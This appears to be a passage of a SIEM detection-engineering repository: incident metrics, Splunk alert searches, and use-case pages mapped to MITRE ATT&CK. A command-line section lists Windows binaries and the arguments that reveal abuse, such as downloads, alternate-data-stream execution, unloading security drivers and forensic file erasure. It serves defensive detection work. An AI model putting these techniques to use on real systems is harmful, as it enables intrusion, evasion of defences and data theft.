8 | - DateTime Owner Notified 9 | - DateTime Escalated 10 | - Recommended Mitigation 11 | - Severity 12 | - Source Use Case 13 | - Source Signature 14 | - Origination 15 | - MITRE ATT&CK Technique 16 | 17 | # Recommended Metrics 18 | - Average Cost Per Incident 19 | - Average Time to Detect 20 | - Average Time to Escalate 21 | - Average Time to Contain 22 | - Average Time to Expel 23 | - Average Time to Notify 24 | - Incidents Opened in a given time frame 25 | - Incidents Closed in a given time frame 26 | - Count of Incidents per Recommended Mitigation 27 | - Count of Incidents per Severity 28 | - Count of Incidents per Severity Not Reviewed Within Required Time 29 | - Count of Incidents per Alert/Rule/Signature 30 | - Count of Incidents per Use Case 31 | - Count of False Positive Incidents Per Use Case 32 | - Count of Incidents per Attack Technique 33 | 34 | 35 | See Also 36 | - [Incident Tracking](/incident-tracking.md) -------------------------------------------------------------------------------- /Orientation/crown-jewels.md: -------------------------------------------------------------------------------- 1 | ## Crown Jewels 2 | The crown jewels should be identified and significant effort should be put in place to protect them. 3 | 4 | - What is the most sensitive data and where is it stored? 5 | - Which are the most sensitive services and what infrastructure supports them? 6 | - Which service accounts exist to support them? 7 | - What are the permitted access methods? 8 | - Who has authority to access these? 9 | - What logs are available for monitoring? 10 | - Which people would cause the most damage if they were socially engineered or their accounts were compromised or abused? -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | These resources are intended to guide a SIEM team to... 2 | * ... develop a workflow for content creation (and retirement) in the SIEM and other security tools. 3 | * ... illustrate detection coverage provided and highlight coverage gaps as goals to fill. 4 | * ... eliminate or add additional layers of coverage based on organizational needs. 5 | * Ensure proper logs are generated and recorded for sufficient detection, investigation, and compliance. 6 | 7 | # Preparation, Prerequisites, etc. 8 | Without covering the basics, there isn't much point in having a SIEM. Harden your environment and configure appropriate auditing on all endpoints. 9 | - [Preparation](/Preparation.md) 10 | - [Incident Response Policy Sample](/Documentation-Templates/Incident-Response-Policy.md) 11 | - [RSS Feeds, Subscriptions, etc](/osintel.md) 12 | - [Logging](/Logging.md) 13 | - [Notable Event IDs](/Notable-Event-IDs.md) 14 | - [IR Tool & Resources](/response-tools-resources.md) 15 | - [Incident Tracking](/incident-tracking.md) 16 | - [Metrics](/Metrics.md) 17 | - [Attacker Tools](/attack-tools-resources.md) 18 | 19 | ## Hardening 20 | - [DNS Security](/hardening/dns-security.md) 21 | - [Email Security](/hardening/email-security.md) 22 | - [General Security](/hardening/general-security.md) 23 | - Microsoft 365 24 | - [Auditing and Reporting](/hardening/microsoft-365-auditing-and-reporting.md) 25 | - [Azure AD](/hardening/microsoft-365-azure-ad.md) 26 | - [Exchange](/hardening/microsoft-365-exchange.md) 27 | - [SharePoint and OneDrive](/hardening/microsoft-365-sharepoint-and-onedrive.md) 28 | - [Teams](/hardening/microsoft-365-teams.md) 29 | - [Microsoft Active Directory](hardening/microsoft-active-directory.md) 30 | - [Microsoft Windows DNS](/hardening/microsoft-windows-dns.md) 31 | - [Microsoft Windows](hardening/microsoft-windows.md) 32 | - [Network](hardening/network.md) 33 | - [Remote Access](/hardening/remote-access.md) 34 | - [Software Manufacturers](/hardening/software-manufacturers.md) 35 | - [Web Security](/hardening/web-security.md) 36 | 37 | 38 | # [Detection Tactics](/Detection-Tactics.md) 39 | 40 | To detect an attacker, one must be equipped with the necessary logs to reveal their activities. Here we use a matrix to map detection tactics to attacker tactics ([Mitre ATT&CK](https://attack.mitre.org/)). 41 | 42 | 43 | # [Detection Methods](/Detection-Methods.md) 44 | 45 | Once necessary logs are collected (detection tactics), use various methods to reveal anomalous, suspicious, and malicious activity. 46 | 47 | 48 | # Detection Use Cases 49 | 50 | Use Cases provide a means to document solutions for many reasons including tracking work, uniform response, content recreation, metrics & reporting, making informed decisions, avoiding work duplication, and more. 51 | 52 | - [Use Case Structure](/Use-Case-Structure.md) 53 | - [Use Case Review](/Use-Cases.md) 54 | 55 | 56 | # Data Enrichment 57 | 58 | These efforts can provide significant benefits to some ingested logs. Typically enrichment will result in either adding a new field to events or a lookup table for use in filtering or filling in a field. 59 | 60 | - GeoIP/ASN Lookup 61 | - Levenshtein Distance 62 | - Shannon Entropy Scores 63 | - String Lengths 64 | - Top 1 Million Domains 65 | - WHOIS Caching 66 | - DNS Lookup 67 | - Reverse-DNS Lookup 68 | - Certificate Parsing 69 | - [O365 Principal App IDs](/Lookups/o365-principalappid.csv) 70 | - [Windows Logon Type Lookups](/Lookups/windows-logon-type.csv) 71 | - [Windows Status Code Lookups](/Lookups/windows-status-code.csv) 72 | 73 | 74 | # [Lab](/Lab/WindowsVictim.md) 75 | Set up a lab with a Windows system, a SIEM, and an attacking system to aid in detection research and development. 76 | 77 | 78 | # TODO 79 | - [ ] Add Use Case Examples 80 | - [ ] Add Threat Hunts Library 81 | - [ ] Add an object oriented, relational database approach to recording and associating all elements to one another - cases, adversaries, techniques, mitigations, detections, hunts, log sources, etc. 82 | -------------------------------------------------------------------------------- /Signatures/Splunk/panorama-config-change-spike.md: -------------------------------------------------------------------------------- 1 | index=pan_logs sourcetype=pan:config NOT command IN (request, commit) earliest=-1h 2 | | fields index, host, src_user, src, dest, command, path 3 | | bucket _time span=1h 4 | | stats count as change_count values(path) as targets by index, host, src_user, src, dest, command 5 | | where change_count > 10 -------------------------------------------------------------------------------- /Signatures/Splunk/panorama-config-change-unknown-user.md: -------------------------------------------------------------------------------- 1 | index=pan_logs sourcetype=pan:config NOT command IN (request, commit) NOT src_user IN (user1, user2, user3) earliest=-1h 2 | | fields index, host, src_user, src, dest, command, path 3 | | stats count as change_count values(path) as targets by index, host, src_user, src, dest, command -------------------------------------------------------------------------------- /Signatures/Splunk/panorama-failed-logon-spike.md: -------------------------------------------------------------------------------- 1 | index=pan_logs sourcetype=pan:system event_id=auth-fail earliest =-1h 2 | | rex field=body "From: (?(?:\d{1,3}\.){3}\d{1,3})" 3 | | stats count as failed_attempts by _time, index, host, src_ip 4 | | where failed_attempts > 5 5 | | table _time, index, host, src_ip, failed_attempts 6 | | sort - _time -------------------------------------------------------------------------------- /Signatures/Splunk/panorama-large-transfer.md: -------------------------------------------------------------------------------- 1 | index=pan_logs sourcetype=pan:traffic earliest=-1h 2 | | eval transfer_mb=bytes_out/1024/1024 3 | | eval hour_of_day=strftime(_time, "%H") 4 | ```| where hour_of_day < "08" OR hour_of_day > "18" ``` 5 | | stats sum(transfer_mb) as total_transfer_mb by src_ip, dest_ip, app, hour_of_day 6 | | where total_transfer_mb > 1024 7 | | table _time, src_ip, dest_ip, app, total_transfer_mb, hour_of_day 8 | | eval total_transfer_mb=round(total_transfer_mb, 2) 9 | | sort - total_transfer_mb -------------------------------------------------------------------------------- /Signatures/Splunk/panorama-src_ip-dest_port-spike.md: -------------------------------------------------------------------------------- 1 | index=pan_logs sourcetype=pan:traffic action=allowed earliest=-1h 2 | | stats dc(dest_port) as dest_port_count by index, src_ip 3 | | where dest_port_count > 100 4 | | table index, src_ip, dest_port_count -------------------------------------------------------------------------------- /Signatures/Splunk/panorama-src_ip-distinct-dest_ip-spike.md: -------------------------------------------------------------------------------- 1 | index=pan_logs sourcetype=pan:traffic earliest=-1h 2 | | stats dc(dest_ip) as dest_ip_count values(dest_ip) as dest_ips by index, src_ip 3 | | where dest_ip_count > 10 4 | | table index, src_ip, dest_ips, dest_ip_count -------------------------------------------------------------------------------- /Signatures/Splunk/panorama-src_ip-unknown-dest_ip-spike.md: -------------------------------------------------------------------------------- 1 | index=pan_logs sourcetype=pan:traffic action!=blocked NOT (dest_ip IN ("192.*", "172.*", "10.*")) earliest=-1h 2 | | stats dc(dest_ip) as dest_ip_count values(dest_ip) as dest_ips by index, src_ip 3 | | where dest_ip_count > 2 4 | | table index, src_ip, dest_ips, dest_ip_count -------------------------------------------------------------------------------- /Signatures/Splunk/panorama-suspicious-dest_port.md: -------------------------------------------------------------------------------- 1 | index=pan_logs sourcetype=pan:traffic action!=blocked NOT (dest_port IN (1197, 1198, 123, 14000, 2638, 3389, 443, 445, 5001, 53, 5450, 9997, 22)) earliest=-1h 2 | | stats count by index, src_ip, transport, dest_port -------------------------------------------------------------------------------- /Signatures/Splunk/panorama-threat-detected.md: -------------------------------------------------------------------------------- 1 | [Palo Alto - Threat Detected] 2 | action.email = 1 3 | action.email.include.search = 1 4 | action.email.inline = 1 5 | action.email.sendcsv = 1 6 | action.email.sendresults = 1 7 | action.email.to = someone@example.com 8 | action.email.useNSSubject = 1 9 | action.webhook.enable_allowlist = 0 10 | alert.expires = 5m 11 | alert.suppress = 0 12 | alert.track = 0 13 | counttype = number of events 14 | cron_schedule = 0 */2 * * * 15 | dispatch.earliest_time = -2h 16 | dispatch.latest_time = now 17 | display.events.fields = ["host","source","sourcetype","eventid","Commandline"] 18 | display.general.type = statistics 19 | display.page.search.mode = verbose 20 | display.page.search.tab = statistics 21 | display.visualizations.chartHeight = 267 22 | display.visualizations.charting.chart = line 23 | enableSched = 1 24 | quantity = 0 25 | relation = greater than 26 | request.ui_dispatch_app = search 27 | request.ui_dispatch_view = search 28 | search = index="pan_logs" sourcetype=pan:threat src_ip!="your-scanner"\ 29 | | rename "app:category" as app_category \ 30 | | fields _time host log_subtype, threat, threat_category, severity, action, app, app_category, category, src_ip, src_port, dest_ip, dest_port\ 31 | | foreach log_subtype, threat, threat_category, severity, action, app, app_category, category, src_ip, src_port, dest_ip, dest_port \ 32 | [ eval <> = if( (len(<>)=0 OR (<>)="" OR isnull(<>)), "-", <>) ] \ 33 | | rename host as PaloAlto\ 34 | | table _time PaloAlto log_subtype, threat, threat_category, severity, action, app, app_category, category, src_ip, src_port, dest_ip, dest_port\ 35 | | sort - _time -------------------------------------------------------------------------------- /Signatures/Splunk/panorama-unkown-app-protocol.md: -------------------------------------------------------------------------------- 1 | index=pan_logs sourcetype=pan:traffic earliest=-1h 2 | | search NOT(app IN (dns-base, ssl, paloalto-updates, pan-db-cloud, sybase, ntp-base, ms-rdp, ms-ds-smbv3, osisoft-pi-v3, unknown-udp, unknown-tcp, insufficient-data, incomplete, splunk, ssh, paloalto-shared-services)) 3 | | stats count by index, src_ip, dest_ip, app, action 4 | | where action="allowed" 5 | | table _time, index, src_ip, dest_ip, app, action, count 6 | | sort - count -------------------------------------------------------------------------------- /Signatures/Splunk/sourcetype-outage-dynamic.md: -------------------------------------------------------------------------------- 1 | ``` 2 | [Stable SourceType Outage] 3 | action.email = 1 4 | action.email.inline = 1 5 | action.email.sendresults = 1 6 | action.email.to = some@one.com 7 | action.email.useNSSubject = 1 8 | action.webhook.enable_allowlist = 0 9 | alert.expires = 7d 10 | alert.suppress = 0 11 | alert.track = 0 12 | counttype = number of events 13 | cron_schedule = 0 6,14 * * * 14 | description = Triggered when sourcetypes/index pairs that typically produce data have stopped. Ignores sourcetypes that do not reliably produce events. 15 | dispatch.earliest_time = -24h@h 16 | dispatch.latest_time = now 17 | display.general.type = statistics 18 | display.page.search.mode = verbose 19 | display.page.search.tab = statistics 20 | enableSched = 1 21 | quantity = 0 22 | relation = greater than 23 | request.ui_dispatch_app = your_app 24 | request.ui_dispatch_view = search 25 | search = | eventcount summarize=false index=* \ 26 | | stats sum(count) as IndexEventCount by index \ 27 | | where IndexEventCount > 0\ 28 | | map [|metadata type=sourcetypes index="$index$" | eval index="$index$"] maxsearches=1000\ 29 | | lookup eventcount_stats.csv index sourcetype OUTPUT Perc10EventCount, Perc25EventCount\ 30 | | where totalCount > 100 ``` Do not monitor empty or temporarily used sourcetypes```\ 31 | | search (Perc10EventCount >= 5) OR (Perc25EventCount >= 20) ``` Do not monitor event types that produce infrequent or a very small number of results, as they can produce an overly sensitive alert unrelated to the actual data pipeline health ```\ 32 | | where recentTime > relative_time(now(),"-7d") ``` Do not monitor sourcetypes not seen in 7 days```\ 33 | | where recentTime < relative_time(now(),"-1d") ``` Alert on sourcetypes not seen in over 1 day```\ 34 | | eval age = now()-recentTime\ 35 | | eval TimeSince = tostring(age,"duration")\ 36 | | convert timeformat="%F %T %Z" ctime(lastTime), ctime(recentTime), ctime(firstTime)\ 37 | | eval Perc10EventCount = round(Perc10EventCount,1)\ 38 | | fields index sourcetype TimeSince Perc10EventCount Perc25EventCount recentTime lastTime firstTime 39 | ``` 40 | 41 | 42 | ``` 43 | [LookupTable - eventcount_stats.csv] 44 | action.email.useNSSubject = 1 45 | action.webhook.enable_allowlist = 0 46 | alert.track = 0 47 | cron_schedule = 0 21 * * 3 48 | dispatch.earliest_time = -30d@d 49 | dispatch.latest_time = now 50 | display.general.type = statistics 51 | display.page.search.mode = fast 52 | display.page.search.tab = statistics 53 | display.visualizations.show = 0 54 | enableSched = 1 55 | request.ui_dispatch_app = search 56 | request.ui_dispatch_view = search 57 | search = | eventcount summarize=false index=* \ 58 | | stats sum(count) as IndexEventCount by index \ 59 | | where IndexEventCount > 0\ 60 | | map [| tstats count WHERE index=$index$ by _time sourcetype span=1d | timechart sum(count) as count by sourcetype limit=0 span=1d | fillnull value=0 | untable _time sourcetype count | stats perc5(count) as Perc05EventCount, perc10(count) as Perc10EventCount, perc25(count) as Perc25EventCount, perc50(count) as Perc50EventCount, perc95(count) as Perc95EventCount, avg(count) as AvgEventCount, sum(count) as TotalEventCount, min(_time) as StartTime, max(_time) as EndTime by sourcetype | eval index="$index$" ] maxsearches=1000 ``` timechart & untable required to create time bins with 0 events ```\ 61 | | table index, sourcetype, StartTime, EndTime, *EventCount\ 62 | | fieldformat EndTime = strftime(EndTime, "%F %T %Z")\ 63 | | fieldformat StartTime = strftime(StartTime, "%F %T %Z")\ 64 | | outputlookup eventcount_stats.csv override_if_empty=false 65 | ``` 66 | -------------------------------------------------------------------------------- /Signatures/Splunk/splunk-general.md: -------------------------------------------------------------------------------- 1 | ### Generic Event Feed Down 2 | Check the latest 7 days for logs, then review the last one day. If a log source has missing logs for an entire day, recent will equal zero and is worth firing an alert to the administrator. 3 | ``` 4 | | tstats latest(_time) as latest where index=* earliest=-7d by sourcetype, index 5 | | eval recent = if(latest > relative_time(now(),"-1d"),1,0) 6 | | eval latest = strftime(latest,"%c") 7 | | where recent = 0 8 | | table index sourcetype latest recent 9 | ``` 10 | 11 | ### Single Event Feed Down 12 | 13 | Use a time window based on how frequently events are expected from each particular source. 14 | ``` 15 | | tstats dc(host) as "Host Count" count as "Event Count" where index="yourindex" 16 | ``` 17 | 18 | ### Auto Pruning Event Feed Down 19 | These two combined ensures only stabilized sourectypes generate errors when they are down. 20 | 21 | Lookup Table Report: 22 | - Schedule: Run Every Week on a day at a time 23 | - Time Range: Last 60d 24 | ``` 25 | | eventcount summarize=false index=* 26 | | stats sum(count) as IndexEventCount by index 27 | | where IndexEventCount > 0 28 | | map 29 | [| tstats count WHERE index=$index$ by _time sourcetype span=1d 30 | | timechart sum(count) as count by sourcetype limit=0 span=1d 31 | | fillnull value=0 32 | | untable _time sourcetype count 33 | | stats perc10(count) as Perc10EventCount, avg(count) as AvgEventCount, sum(count) as TotalEventCount, min(_time) as StartTime, max(_time) as EndTime by sourcetype 34 | | eval index="$index$" ] maxsearches=1000 ``` timechart & untable required to create time bins with 0 events ``` 35 | | table index, sourcetype, StartTime, EndTime, *EventCount 36 | | fieldformat EndTime = strftime(EndTime, "%F %T %Z") 37 | | fieldformat StartTime = strftime(StartTime, "%F %T %Z") 38 | | outputlookup eventcount_stats.csv override_if_empty=false 39 | ``` 40 | 41 | Saved Search (alert): 42 | - Time Range: Last 24h 43 | - Cron Expression to run every 12 hours: 0 */12 * * * 44 | - Expires: 7d 45 | ``` 46 | | eventcount summarize=false index=* 47 | | stats sum(count) as IndexEventCount by index 48 | | where IndexEventCount > 0 49 | | map 50 | [| metadata type=sourcetypes index="$index$" 51 | | eval index="$index$"] maxsearches=1000 52 | | lookup eventcount_stats.csv index sourcetype OUTPUT Perc10EventCount 53 | | where totalCount > 100 ``` Do not monitor empty or temporarily used sourcetypes``` 54 | | where Perc10EventCount >= 5 ``` Do not monitor event types that produce infrequent or a very small number of results, as they can produce an overly sensitive alert unrelated to the actual data pipeline health ``` 55 | | where recentTime > relative_time(now(),"-7d") ``` Do not monitor sourcetypes not seen in 7 days``` 56 | | where recentTime < relative_time(now(),"-1d") ``` Alert on sourcetypes not seen in over 1 day``` 57 | | eval age = now()-recentTime 58 | | eval TimeSince = tostring(age,"duration") 59 | | convert timeformat="%F %T %Z" ctime(lastTime), ctime(recentTime), ctime(firstTime) 60 | | eval Perc10EventCount = round(Perc10EventCount,1) 61 | | fields index sourcetype TimeSince Perc10EventCount recentTime lastTime firstTime totalCount 62 | ``` -------------------------------------------------------------------------------- /Splunk/apps/Splunk_TA_paloalto/local/props.conf: -------------------------------------------------------------------------------- 1 | [pan:system] 2 | EXTRACT-user = authenticated for user \'(?[^']+) 3 | EXTRACT-src1 = From: (?[^,]+) 4 | EVAL-src = rtrim(src1, ".\"") 5 | EXTRACT-user = failed authentication for user \'(?[^']+) 6 | EXTRACT-Reason = Reason: (?[^,]+) -------------------------------------------------------------------------------- /Tactics/API-Usage.md: -------------------------------------------------------------------------------- 1 | # API Usage Use Cases 2 | 3 | Grouped by [Detection Method](/Detection-Methods.md) 4 | 5 | 6 | ## Aggregate Count 7 | - Count of Events per Source User/Token 8 | - Count of Events per Target System 9 | 10 | 11 | ## Blacklist Alert 12 | - Calls with Command-line Syntax 13 | 14 | 15 | ## Whitelist Alert 16 | 17 | 18 | ## Levenshtein Score Alert 19 | 20 | 21 | ## Rolling Whitelist Alert 22 | 23 | 24 | ## Shannon Entropy Score Alert 25 | 26 | 27 | ## Threshold Alert 28 | 29 | 30 | # Log Source Examples 31 | 32 | 33 | # Possible False Positives -------------------------------------------------------------------------------- /Tactics/Account-Creation.md: -------------------------------------------------------------------------------- 1 | # Account Creation Use Cases 2 | 3 | Grouped by [Detection Method](/Detection-Methods.md) 4 | 5 | 6 | ## Aggregate Count 7 | - Count of Events per Source User 8 | 9 | 10 | ## Blacklist Alert 11 | - Account Created Outside Business Hours 12 | - Account Created by Non-Privileged User 13 | - Local Account Created 14 | 15 | 16 | ## Whitelist Alert 17 | - Account Created With Unrecognized Naming Convention 18 | 19 | 20 | ## Levenshtein Score Alert 21 | - Account Created With Name Similar to "Admin" 22 | - Account Created With Name Similar to "Administrator" 23 | - Account Created With Name Similar to the local service account naming convention 24 | 25 | 26 | ## Rolling Whitelist Alert 27 | - Newly Observed Source User 28 | 29 | 30 | ## Shannon Entropy Score Alert 31 | - Account Created With Randomized Name 32 | 33 | 34 | ## Threshold Alert 35 | - Count exceeds threshold 36 | 37 | 38 | # Log Source Examples 39 | - Windows Security Event ID 4720: A user account was created 40 | 41 | 42 | # Possible False Positives 43 | -------------------------------------------------------------------------------- /Tactics/Account-Logon.md: -------------------------------------------------------------------------------- 1 | # Account Logon Use Cases 2 | 3 | Grouped by [Detection Method](/Detection-Methods.md) 4 | 5 | 6 | ## Aggregate Count 7 | - Count of Successful/Failed Events per Hour 8 | - Count of Successful/Failed Events per Source System 9 | - Count of Successful/Failed Events per Source User 10 | 11 | 12 | ## Blacklist Alert 13 | - Account Logon After Employee End Date 14 | - Account Logon During Unusual Time of Day 15 | - Account Logon During Unusual Day of Week 16 | - Service Account Interactive Logon 17 | 18 | 19 | ## Whitelist Alert 20 | - A user with an unrecognized naming convention is observed 21 | 22 | 23 | ## Levenshtein Score Alert 24 | - Account Created With Name Similar to "Admin" 25 | - Account Created With Name Similar to "Administrator" 26 | - Account Created With Name Similar to the local service account naming convention 27 | 28 | 29 | ## Rolling Whitelist Alert 30 | - Newly Observed Source User 31 | - Newly Observed Source User=Service Account, Type=Interactive 32 | - Newly Observed Source User, Destination Host 33 | 34 | 35 | ## Shannon Entropy Score Alert 36 | 37 | 38 | ## Threshold Alert 39 | - User Name, Destination Host where Destination Host Count exceeds threshold 40 | - Source Account, Outcome=Failure where Count exceeds threshold 41 | - Source Account, Outcome=Failure, Destination Host where Destination Host Count exceeds threshold 42 | 43 | 44 | # Log Source Examples 45 | - Windows Security Event ID 4624: An account was successfully logged on 46 | - Windows Security Event ID 4625: An account failed to log on 47 | - Windows Security Event ID 4648: A logon was attempted using explicit credentials 48 | - VPN Logons 49 | - SSH Logons 50 | - Application Logons 51 | 52 | 53 | # Possible False Positives 54 | - May pick up failed service accounts repeatedly trying to "do their job" with a locked account. Notifying the appropriate admin is a good idea here. 55 | -------------------------------------------------------------------------------- /Tactics/Account-Modification.md: -------------------------------------------------------------------------------- 1 | # TODO: Merge into Tactics md's 2 | 3 | # Account Modification Use Cases 4 | 5 | Grouped by [Detection Method](/Detection-Methods.md) 6 | 7 | 8 | ## Aggregate Count 9 | - Count of Events per Source User 10 | - Count of Events per Target User 11 | 12 | 13 | 14 | ## Blacklist Alert 15 | - Member Added to Privileged Group (e.g. destination group contains "admin") 16 | - Smart Card Logon Disabled (in environments with required 2FA) 17 | 18 | 19 | 20 | ## Whitelist Alert 21 | - Non-Privileged User Modifying Accounts 22 | - Non-Authorized Service Account Modifying Accounts 23 | - System Account Modifying Accounts 24 | - Non-Privileged User Added to Privileged Group 25 | 26 | 27 | ## Levenshtein Score Alert 28 | 29 | 30 | ## Rolling Whitelist Alert 31 | - Newly Observed Source User 32 | 33 | 34 | ## Shannon Entropy Score Alert 35 | 36 | 37 | ## Threshold Alert 38 | - Source User, Destination User where Destination User Count exceeds threshold 39 | 40 | 41 | # Log Source Examples 42 | - Windows Security Event ID 4728: A member was added to a security-enabled global group 43 | - Windows Security Event ID 4738: A user account was changed 44 | - Windows Security Event ID 4732: A member was added to a security-enabled local group 45 | - Windows Security Event ID 4756: A member was added to a security-enabled universal group 46 | - Windows Security Event ID 4767: A user account was unlocked 47 | - Windows Security Event ID 4722: A user account was enabled 48 | - Windows Security Event ID 4723: An attempt was made to change an accounts password 49 | - Windows Security Event ID 4724: An attempt was made to reset an accounts password 50 | - Windows Security Event ID 4725: A user account was disabled 51 | - Windows Security Event ID 4726: A user account was deleted 52 | - Windows Security Event ID 4781: The name of an account was changed 53 | 54 | 55 | # Possible False Positives 56 | -------------------------------------------------------------------------------- /Tactics/Application-Log.md: -------------------------------------------------------------------------------- 1 | # Application Log Use Cases 2 | 3 | 4 | Grouped by [Detection Method](/Detection-Methods.md) 5 | 6 | 7 | ## Aggregate Count 8 | 9 | 10 | ## Blacklist Alert 11 | 12 | 13 | ## Whitelist Alert 14 | 15 | 16 | ## Levenshtein Score Alert 17 | 18 | 19 | ## Rolling Whitelist Alert 20 | - Newly Observed Host IPS Signature 21 | - Newly Observed Host IPS Signature per System/User 22 | - Newly Observed IPS Signature 23 | - Newly Observed IPS Signature per Source System 24 | - Newly Observed IPS Signature per Target System 25 | - Newly Observed IPS Source System 26 | - Newly Observed IPS Target System 27 | 28 | 29 | ## Shannon Entropy Score Alert 30 | 31 | 32 | ## Threshold Alert 33 | - Signature Name where Count exceeds threshold 34 | 35 | 36 | # Log Source Examples 37 | - DHCP Server Logs 38 | - Reverse Web Proxy Logs 39 | - Host IDS Logs 40 | - Microsoft-Windows-Windows Defender/Operational Event ID 1115 41 | - Microsoft-Windows-Windows Defender/Operational Event ID 1116 42 | 43 | 44 | # Possible False Positives 45 | -------------------------------------------------------------------------------- /Tactics/Commandline-Activity.md: -------------------------------------------------------------------------------- 1 | # Commandline Activity Use Cases 2 | 3 | Grouped by [Detection Method](/Detection-Methods.md) 4 | 5 | MITRE ATT&CK Framework: [Command-Line Interface (T1059)](https://attack.mitre.org/techniques/T1059), [PowerShell (T1086)](https://attack.mitre.org/techniques/T1086), [Inhibit System Recovery](https://attack.mitre.org/versions/v12/techniques/T1490/) 6 | 7 | - Execution of malicious commands AND scripts from command-line interfaces. 8 | 9 | 10 | ## Aggregate Count 11 | - Process file names (without path) 12 | - Process file names (with path) 13 | - rundll32.exe DLL Paths 14 | - regsvr32.exe DLL Paths 15 | 16 | 17 | ## [Match Alert](https://github.com/TonyPhipps/SIEM/blob/master/Detection-Methods.md#match-alarm) 18 | 19 | 20 | Question the use of these, as they are infrequently used legitimately 21 | - at.exe 22 | - aspnet_compiler.exe 23 | - CustomShellHost.exe to execute an explorer.exe child process 24 | - DeviceCredentialDeployment.exe to hide a process (T1564) 25 | - makecab.exe (T1105, T1564.004, T1036) 26 | - pktmon.exe to capture packets (T1040) 27 | - rpcping.exe to exploit RPC (T1003, T1187) 28 | 29 | #### !!!! IMPORTANT NOTES !!!! 30 | - MANY commandlines can use - OR / interchangeably. Account for this! 31 | - Commandlines can have junk characters like ^ to obfuscate detections, where the command is ran as if those characters didn't exist. 32 | - Any inclusion of "http" can be supplemented by a pattern to match IP addresses for web communication. 33 | 34 | ---------------------- 35 | 36 | - addinutil.exe 37 | - "-AddinRoot:" to set root directory for addins 38 | 39 | - appinstaller.exe 40 | - "http" to attempt to load/install a package from a URL and save in INetCache 41 | 42 | - atbroker.exe 43 | - "/start" to execute code referenced in a prestaged registry key 44 | 45 | - auditpol.exe 46 | - "/set" AND "disable" 47 | 48 | - bcdedit.exe 49 | - "recoveryenabled" 50 | - "ignoreallfailures" 51 | - "minimal" (T1059, T1490) 52 | 53 | - bitsadmin.exe 54 | - "/create" to make a new job which can download, copy, execute, and create alternate data streams 55 | 56 | - certoc.exe 57 | - "-loaddll" 58 | - "-getcacaps" 59 | 60 | - certreq.exe 61 | - "-config" AND "http" to download content 62 | - "-post" AND "http" to either download or upload data 63 | 64 | - certutil.exe 65 | - "-urlcache" to download files 66 | - "url" 67 | - "ping" 68 | - "http" 69 | - "ftp" 70 | - "-decode" 71 | - "-encode" 72 | - "-addstore" 73 | 74 | - chrome.exe 75 | - "headless" 76 | - "remote-debugging" 77 | 78 | - cmd.exe 79 | - "http" 80 | - "ftp" 81 | - "reg add" 82 | - "^" to attempt obfuscation 83 | - "<" AND ":" to execute an alternate data stream 84 | - DeviceCredentialDeployment.exe" to hide a process (T1564) 85 | 86 | - cmdkey.exe 87 | - "/list" to list cached credentials 88 | 89 | - cmdl32.exe 90 | - "/vpn" AND "/lan" to download files 91 | 92 | - cmstp.exe 93 | - "/ni" AND "/s" to execute malicious .INF (T1218.003) 94 | - "http" to download (T1218.003) 95 | 96 | - colorcpl.exe 97 | - copies any file to C:\Windows\System32\spool\drivers\color\ for staging (T1036.005) 98 | 99 | - configsecuritypolicy.exe 100 | - "http" to download or upload a file (T1567 or T1105) 101 | 102 | - conhost.exe 103 | - ".exe" to execute another command (T1202) 104 | - "--headless" to hide child process window (T1202) 105 | 106 | - control.exe 107 | - ":" to execute alternate data stream (T1218.002) 108 | 109 | - csc.exe 110 | - "-out:" to compile code locally, bypassing defenses. (T1127) 111 | - "-target": to compile code locally, bypassing defenses. (T1127) 112 | 113 | - cscript.exe 114 | - ".js" 115 | - ".jse" 116 | - ".vba" 117 | - ".vbe" 118 | - ".vbs" 119 | - ".wsf" 120 | - "//e:" to execute a script file with a specific engine (not a typo, two slashes) 121 | 122 | - datasvcutil.exe 123 | - "http" to upload files (T1567) 124 | 125 | - desktopimagedownldr.exe 126 | - "http" to download a file and set it as the screensaver (T1105) 127 | 128 | - diantz.exe 129 | - ":" to compress a file into an alternate data stream (T1564.004) 130 | - "http" to download and compress a file (T1105) 131 | 132 | - diskshadow.exe 133 | - "/s" to execute a prepared diskshadow script (T1003.003) 134 | - "> exec " to execute a child process (T1202) 135 | 136 | - dnscmd.exe 137 | - "/config" AND "/serverlevelplugindll" to add a malicious dll as a plugin of the DNS service. (T1543.003) 138 | 139 | - esentutl.exe 140 | - "/y" AND "/vss" to copy a file via volume shadow copy (T1003.003) 141 | - "y" AND "/d" AND ":" AND "/o" to copy a file to an alternate data stream (T1564.004) 142 | - "http" to download a file (T1564.004) 143 | 144 | - expand.exe 145 | - ":" to expand into an alternate data stream. (T1564.004) 146 | 147 | - extexport.exe 148 | - ":\" to load an executable named mozcrt19.dll, mozsqlite3.dll, or sqlite.dll from a supplied folder path (T1218) 149 | 150 | - extrac32.exe 151 | - ":" to extract a CAB file into an alternate data stream. (T1564.004) 152 | - "/C" to copy a file to another folder. (T1105) 153 | 154 | - explorer.exe 155 | - ".exe" to indirectly execute commands (T1202) 156 | 157 | - findstr.exe 158 | - ":" and "/V" to write to an alternate data stream (T1564.004) 159 | 160 | - finger.exe 161 | - "http" to download a malicious payload (T1105) 162 | 163 | - fltMC.exe 164 | - "unload" to unload a driver used by a security agent (T1562.001) 165 | - "detach" (T1054) 166 | 167 | - forfiles.exe 168 | - "/p" and "/m" to execute another binary (T1202) 169 | 170 | - fsutil.exe 171 | - "setZeroData" to forensically erase a file (T1485) 172 | - "deletejournal" to delete the USN journal volume, hiding file creation activity (T1485) 173 | - "trace decode" to executes a binary named netsh.exe from the current directory (T1218) 174 | 175 | - ftp.exe 176 | - "-s:" to execute cmd commands from a referenced text file (T1202) 177 | 178 | - hh.exe1 179 | - "http" to download a file (T1105) 180 | - ".exe" to execute another executable (T1218.001) 181 | 182 | - ie4uinit.exe 183 | - "-BaseSettings" to execute malicious commands from a prepared ie4uinit.inf file (T1218) 184 | 185 | - iediagcmd.exe 186 | - "set" and "/out:" to execute a binary that is pre-planted at C:\somedir\system32\netsh.exe. (T1218) 187 | 188 | - ieexec.exe 189 | - "http" to download a file (T1105) 190 | 191 | - ilasm.exe 192 | - "/exe" or "/dll" to compile a file (T1127) 193 | 194 | - installutil.exe 195 | - "http" to download a file to INetCache (T1105) 196 | 197 | - imewdbld.exe 198 | - "http" to download a file to INetCache (T1105) 199 | 200 | - InstallUtil.exe 201 | - "logfile=" 202 | - "LogToConsole=false" 203 | - "/U" (T1118) 204 | 205 | - ldifde.exe 206 | - "-i -f" to import a file into LDAP (T1105) 207 | 208 | - mavinject.exe 209 | - "/injectrunning" to inject a dll into a process (T1218.013) 210 | 211 | - MpCmdRun.exe 212 | - "DownloadFile" to download from internet (T1105) 213 | - 